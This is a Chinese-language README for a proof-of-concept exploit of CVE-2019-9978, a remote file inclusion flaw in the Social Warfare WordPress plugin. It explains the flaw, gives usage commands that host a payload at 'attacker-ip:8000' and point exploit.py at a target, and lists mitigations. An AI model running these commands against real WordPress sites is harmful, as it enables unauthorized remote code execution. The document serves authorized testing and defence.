该仓库包含一个基于 Python 的概念验证 (PoC),演示了 CVE-2019-9978 的利用过程,该漏洞是 Social Warfare WordPress 插件中的一个严重漏洞。
该漏洞允许未认证的攻击者执行远程文件包含 (RFI),通过在攻击者控制的服务器上托管恶意负载,可将其升级为*远程代码执行 (RCE)**。
此 PoC 是在受控的 WordPress 实验室环境中开发和测试的,仅供教育和授权的安全测试使用。
Social Warfare 插件未能正确验证和清理用于远程内容包含的用户输入。
因此,攻击者可以提供一个恶意外部 URL,从而导致未认证的远程文件包含。
当被包含的远程文件中含有可执行的 PHP 代码时,这些代码将在 WordPress 服务器的上下文中执行,从而导致远程代码执行。
Unauthenticated HTTP Request
↓
Remote File Inclusion (External URL)
↓
Malicious Payload Execution
↓
Remote Code Execution (RCE)
python3 -m http.server 8000
将你的负载文件(例如 payload-main.txt)放置在服务器目录中。
python3 exploit.py <target-site.com> http://attacker-ip:8000/payload-main.txt
将 Social Warfare 插件更新到已修补的版本
禁用远程文件包含:
allow_url_include = Off
限制 WordPress 插件中的外部 URL 处理
部署带有 RFI 检测规则的 Web 应用防火墙 (WAF)
本项目严格仅用于教育目的和授权的安全测试。
未经明确许可,请不要将此概念验证用于任何系统。 作者不对因使用此工具而造成的任何滥用或损害负责。